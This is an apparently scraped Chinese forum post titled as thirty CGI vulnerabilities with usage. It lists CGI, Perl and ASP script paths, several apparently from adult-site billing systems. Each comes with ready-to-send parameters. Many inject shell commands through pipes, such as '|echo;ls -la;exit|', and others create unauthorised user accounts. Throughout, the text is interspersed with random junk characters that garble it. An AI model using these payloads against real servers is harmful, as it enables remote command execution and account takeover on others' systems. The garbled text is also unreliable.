Cgi-bin 30个漏洞＋使用方法

admin

==============================
* K: y4 z, B# @3 g5 |4 P4 Z
) J; l% X  n! Q2 @- k$ j9 v/smspass.pl
username=username&password=password
% }% X4 D+ ?4 e( z1 k- i  g
/index.cgi
wei=ren&gen=command

/passmaster.cgi
Action=Add&Username=Username&Password=Password
. r' _  o1 W3 }  R- C$ G+ s
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
  ~% U/ Y/ d4 }  l  J
) o0 |1 B7 k4 {# X/form.cgi
8 z1 W0 {; S) X, e/ M" ]9 Mname=xxxx&email=email&subject=xxxx&response=|echo;ls|

/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
( Z+ x- I. S+ n' _* Z/ e, i8 t/ Kuser=username&pass=Password&confirm=Password
, P$ z8 O. j6 K$ G8 j4 M; y: d
/ccbill-local.asp
post_values=username:password
, f* O" |% W% _" [$ T8 J. ?) D4 [
/count.cgi
  [/ v( |7 p, m5 e1 S, [/ |& F! zpinfile=|echo;ls -la;exit|
& N. }8 n# ?  y
( |* G1 c& S- t4 A5 G- Q/recon.cgi
" h; ^$ C$ \3 i  ]0 M/recon.cgi?search
2 ]( G7 o' I/ `- U/ {" Msearchoption=1&searchfor=|echo;ls -al;exit|
, B/ K/ [/ _# J
/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
- i0 {( I/ S& O# H6 s3 \
# `0 C/ N3 O$ N' B0 q: @) ?/af.cgi
3 {( f/ |! X2 ?3 `3 Z8 B8 }_browser_out=|echo;ls -la;exit;|
  l3 A0 o1 L8 Y; L: i
/modify.cgi
; A+ ~% S3 V* eusername=username&password=password&expire=30

/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|

/gx9passwd.cgi
cmd=ADD&user=username&pass=password
  n9 Y0 T6 B& |3 ]2 \' t- u5 i' g
/probecontrol.cgi
7 @0 W, a& s4 W) P; q6 w; hcommand=enable&username=username&password=password
6 b* E. R) e+ J' q( f1 L4 W7 R5 G/ n9 Z
/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit
+ f3 J7 d7 S. x
/htadd.pl
; M+ A) f& C% W4 z4 uconfigfile=|echo; ls -alt; exit

* Y8 a" p8 p4 b# L, C9 Y! `+ d/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/ibill*.pl
, h7 c! Q, N9 K0 m: w$ Kreqtype=add&authpwd=authpwd&username=username&password=password
  n- h' o6 \7 G9 [% o2 T
: Q8 J% E# ?# k/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)

/globill_ut.cgi
" M6 u5 P% w8 ]: [+ \do=add&username=username&password=password&wpassword=password

/usercontrol.cgi
command=enable&username=USER&password=PASS

/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password
( I' {5 W. b& g7 d) o
/addusr.pl
user=USER&pass=PASS&confirm=PASS

/ @6 D" @7 H4 z/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
& E/ a* ?. `" Z# w* [9 Rpinfile=|echo;pwd;exit|

/accountcreate.cgi
1 h" u% ]  W0 i7 O/cgi-bin/gateway/accountcreate.cgi
1 N) p/ ^9 o7 dusername=username&password=password&password2=password&ref1=|echo;ls -al;exit

/af.cgi
, H( i) ^0 H8 f& b/env.cgi
1 Y& Q$ B6 L% y1 pADD+;echo;pwd;exit

/count.cgi
6 X9 L$ S9 W$ P& k+ zpinfile=|echo;pwd;exit|

/ ~" I6 z; `4 j/ a& g3 w; ?/recon.cgi
- I/ D! I& a8 [) H" j8 t: lsearchoption=1&searchfor=|echo;ls%20-al;exit|
  {0 c* r% k4 v+ {7 e" M
3 b' Q* i, x3 z+ t1 I. A: j/add.cgi
username=username&password=password&expire=30

% P3 p$ B. B  i5 _, o( h6 m2 }==============================
/ G7 G% L/ `9 u